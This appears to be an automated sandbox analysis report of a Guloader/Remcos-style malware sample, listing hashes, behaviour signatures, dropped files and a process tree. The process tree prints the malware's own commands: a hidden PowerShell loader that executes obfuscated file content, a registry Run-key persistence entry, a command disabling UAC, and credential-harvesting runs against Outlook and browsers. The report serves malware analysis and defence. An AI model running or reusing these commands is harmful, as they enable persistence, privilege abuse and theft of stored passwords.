Analysis

  • max time kernel
    149s
  • max time network
    149s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240704-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240704-enlocale:en-usos:windows10-2004-x64system
  • submitted
    09-07-2024 11:16

General

  • Target

    MalwareBazaar.exe

  • Size

    401KB

  • MD5

    f1043033237fa935ef9af72415e657a1

  • SHA1

    b1ce2973b99811fe469ae6b4c450e97d4d4f4a20

  • SHA256

    a03913b0dcf4d9707eb9c74d69b522927e760e9be55effb0e14ebbbaad9177c7

  • SHA512

    1f4971262c297f2fa58234d7787ea384a168633eadce39e9334d9e7f5e5924b40eb47b84cc83ec8c29c62212863f17340a5525007d25f721c900e5583cf8dd3b

  • SSDEEP

    6144:FM23AboMfTvNXDQV1yKE2C7qNIZX8il32bcHXgjv3bO43f1WYq6cVjWZSlhhEV:nGoGNzQ+DZX8M2bc3Av3bO43tW5WZl

Malware Config

Signatures

  • Guloader,Cloudeye

    A shellcode based downloader first seen in 2020.

  • UAC bypass 3 TTPs 1 IoCs
  • NirSoft MailPassView 1 IoCs

    Password recovery tool for various email clients

  • NirSoft WebBrowserPassView 1 IoCs

    Password recovery tool for various web browsers

  • Nirsoft 3 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

  • Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies registry key 1 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 16 IoCs
  • Suspicious behavior: MapViewOfSection 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 32 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\MalwareBazaar.exe
    "C:\Users\Admin\AppData\Local\Temp\MalwareBazaar.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2456
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" -windowstyle hidden "$Vindflj=Get-Content 'C:\Users\Admin\AppData\Roaming\annekskirkers\dommedagens\nonmenial\delysten.imp';$Byggryn=$Vindflj.SubString(71093,3);.$Byggryn($Vindflj)"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • Suspicious use of SetThreadContext
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2952
      • C:\Program Files (x86)\windows mail\wab.exe
        "C:\Program Files (x86)\windows mail\wab.exe"
        3⤵
        • Suspicious use of NtCreateThreadExHideFromDebugger
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • Suspicious use of SetThreadContext
        • Suspicious behavior: MapViewOfSection
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of WriteProcessMemory
        PID:3188
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%pantstnings% -windowstyle minimized $Uselessness=(Get-ItemProperty -Path 'HKCU:\Chet\').Ruelike;%pantstnings% ($Uselessness)"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:1692
          • C:\Windows\SysWOW64\reg.exe
            REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%pantstnings% -windowstyle minimized $Uselessness=(Get-ItemProperty -Path 'HKCU:\Chet\').Ruelike;%pantstnings% ($Uselessness)"
            5⤵
            • Adds Run key to start application
            • Modifies registry key
            PID:1776
        • C:\Windows\SysWOW64\cmd.exe
          /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:2912
          • C:\Windows\SysWOW64\reg.exe
            C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
            5⤵
            • UAC bypass
            • Modifies registry key
            PID:5068
        • C:\Program Files (x86)\windows mail\wab.exe
          "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\eqvzfosugnwwqzscdxvnwhyeyf"
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          PID:4948
        • C:\Program Files (x86)\windows mail\wab.exe
          "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\pkakggdouvojafgguiiozutvhmvho"
          4⤵
          • Accesses Microsoft Outlook accounts
          PID:208
        • C:\Program Files (x86)\windows mail\wab.exe
          "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\rmochzopidgodtcsdsvikznepafihxzbm"
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2844
  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=4112,i,3409420486566309625,12100452682816721435,262144 --variations-seed-version --mojo-platform-channel-handle=4032 /prefetch:8
    1⤵
      PID:1456

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\ProgramData\remcos\logs.dat

      Filesize

      144B

      MD5

      4496987350b4a169bec8278ece79cb10

      SHA1

      8ff5a04d767b629fd84994aea45f1220ff917e74

      SHA256

      945ba0e98daefbf99b29b2c5f06e616bb3cc42d4b802e3111a7581a6acf5e821

      SHA512

      61ee8b463e918b47fb1c4496cab11adecd72eeb49dfbd33a676ac694958a20edacf40d0846a575f223032ca1310c8cd8f2142a5dec17ecd5ff74c30a3a719ba4

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_tuqy1ake.eew.ps1

      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    • C:\Users\Admin\AppData\Local\Temp\eqvzfosugnwwqzscdxvnwhyeyf

      Filesize

      4KB

      MD5

      be3be306ce816aa6030d9bfec1df34b0

      SHA1

      66b10c4578245de0f78c445119e67f0bfb84bbf3

      SHA256

      0c38ee44dc9eb4f240b667240c115fed88091bc04001d909b841ad8570738467

      SHA512

      b9aee88755e6e239c7aa1d3c39488722786c1faa01de3c70cf822059f461ca277965b8dd50773e015444a83cc69b5f31c6379957de54a5073ef8799b26a12bcc

    • C:\Users\Admin\AppData\Roaming\annekskirkers\dommedagens\nonmenial\Skyldsttendes.Und

      Filesize

      350KB

      MD5

      be381f7baf52513e52dfed9361a6dc69

      SHA1

      a6cdb30ea1a85a42404e6e2fd29c8d5cc6ad251a

      SHA256

      caceb5002866580c07883f8fddb62a82d7fadd1e8ca7a2eb4e11240dfda94d79

      SHA512

      c076aa00785538010dcc9df6aaba0f8af5f130b7edc800fca31da4fff9ee11fa728ba5c78c89047494b0536878d8b32d3f05f43177dacf0416726b02af814c8a

    • C:\Users\Admin\AppData\Roaming\annekskirkers\dommedagens\nonmenial\delysten.imp

      Filesize

      69KB

      MD5

      8172795f7c8cfb7cc597e879d2b0b468

      SHA1

      811797a9309a1bc3429f3bc7735eb6af1a7c80dc

      SHA256

      5339721e47b9ac3dfb81b6d81593e9792c57573541918c0d5ca327128aa4345c

      SHA512

      9718f72091367ed6a02598295a9f35512c6ddb31e3dae9b685060e613c942c755d90418cb4ea31e4bf7ea8967ce34c9356bbf53fafe08a31d851afddd55d7322

    • memory/208-70-0x0000000000400000-0x0000000000462000-memory.dmp

      Filesize

      392KB

    • memory/208-72-0x0000000000400000-0x0000000000462000-memory.dmp

      Filesize

      392KB

    • memory/208-66-0x0000000000400000-0x0000000000462000-memory.dmp

      Filesize

      392KB

    • memory/2844-69-0x0000000000400000-0x0000000000424000-memory.dmp

      Filesize

      144KB

    • memory/2844-73-0x0000000000400000-0x0000000000424000-memory.dmp

      Filesize

      144KB

    • memory/2844-67-0x0000000000400000-0x0000000000424000-memory.dmp

      Filesize

      144KB

    • memory/2952-40-0x0000000074320000-0x0000000074AD0000-memory.dmp

      Filesize

      7.7MB

    • memory/2952-47-0x0000000074320000-0x0000000074AD0000-memory.dmp

      Filesize

      7.7MB

    • memory/2952-30-0x0000000005FA0000-0x0000000005FBA000-memory.dmp

      Filesize

      104KB

    • memory/2952-31-0x0000000006090000-0x00000000060B2000-memory.dmp

      Filesize

      136KB

    • memory/2952-32-0x0000000007260000-0x0000000007804000-memory.dmp

      Filesize

      5.6MB

    • memory/2952-28-0x0000000005B20000-0x0000000005B6C000-memory.dmp

      Filesize

      304KB

    • memory/2952-34-0x0000000007E90000-0x000000000850A000-memory.dmp

      Filesize

      6.5MB

    • memory/2952-36-0x0000000074320000-0x0000000074AD0000-memory.dmp

      Filesize

      7.7MB

    • memory/2952-37-0x0000000074320000-0x0000000074AD0000-memory.dmp

      Filesize

      7.7MB

    • memory/2952-38-0x0000000074320000-0x0000000074AD0000-memory.dmp

      Filesize

      7.7MB

    • memory/2952-27-0x0000000005A80000-0x0000000005A9E000-memory.dmp

      Filesize

      120KB

    • memory/2952-9-0x000000007432E000-0x000000007432F000-memory.dmp

      Filesize

      4KB

    • memory/2952-42-0x0000000074320000-0x0000000074AD0000-memory.dmp

      Filesize

      7.7MB

    • memory/2952-41-0x0000000008510000-0x000000000AD4F000-memory.dmp

      Filesize

      40.2MB

    • memory/2952-43-0x000000007432E000-0x000000007432F000-memory.dmp

      Filesize

      4KB

    • memory/2952-45-0x0000000074320000-0x0000000074AD0000-memory.dmp

      Filesize

      7.7MB

    • memory/2952-46-0x0000000074320000-0x0000000074AD0000-memory.dmp

      Filesize

      7.7MB

    • memory/2952-29-0x0000000005FF0000-0x0000000006086000-memory.dmp

      Filesize

      600KB

    • memory/2952-10-0x00000000021D0000-0x0000000002206000-memory.dmp

      Filesize

      216KB

    • memory/2952-11-0x0000000074320000-0x0000000074AD0000-memory.dmp

      Filesize

      7.7MB

    • memory/2952-26-0x0000000005490000-0x00000000057E4000-memory.dmp

      Filesize

      3.3MB

    • memory/2952-15-0x0000000004C90000-0x0000000004CF6000-memory.dmp

      Filesize

      408KB

    • memory/2952-12-0x0000000004DF0000-0x0000000005418000-memory.dmp

      Filesize

      6.2MB

    • memory/2952-16-0x0000000005420000-0x0000000005486000-memory.dmp

      Filesize

      408KB

    • memory/2952-14-0x0000000004AF0000-0x0000000004B12000-memory.dmp

      Filesize

      136KB

    • memory/2952-13-0x0000000074320000-0x0000000074AD0000-memory.dmp

      Filesize

      7.7MB

    • memory/3188-85-0x0000000020740000-0x0000000020759000-memory.dmp

      Filesize

      100KB

    • memory/3188-89-0x0000000020740000-0x0000000020759000-memory.dmp

      Filesize

      100KB

    • memory/3188-88-0x0000000020740000-0x0000000020759000-memory.dmp

      Filesize

      100KB

    • memory/3188-60-0x0000000001DC0000-0x00000000045FF000-memory.dmp

      Filesize

      40.2MB

    • memory/4948-71-0x0000000000400000-0x0000000000478000-memory.dmp

      Filesize

      480KB

    • memory/4948-68-0x0000000000400000-0x0000000000478000-memory.dmp

      Filesize

      480KB

    • memory/4948-65-0x0000000000400000-0x0000000000478000-memory.dmp

      Filesize

      480KB